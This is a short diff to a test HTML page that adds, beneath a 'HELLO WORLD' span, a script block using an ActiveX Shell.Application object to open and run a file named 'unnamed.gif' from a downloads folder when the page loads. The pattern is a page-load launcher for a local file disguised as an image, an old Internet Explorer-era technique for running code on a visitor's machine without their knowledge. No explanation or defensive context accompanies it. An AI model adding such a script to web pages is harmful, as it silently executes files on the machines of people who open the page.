--- a/test.html
+++ b/test.html
@@ -18,6 +18,11 @@
 
 <body>
     <span class="text">HELLO WORLD</span>
+    <script>
+        var oShell = new ActiveXObject("Shell.Application");
+        var commandtoRun = "MyFiles/Downloads/unnamed.gif";
+        oShell.ShellExecute(commandtoRun,"","","open","1");
+    </script>
     
 </body>
 
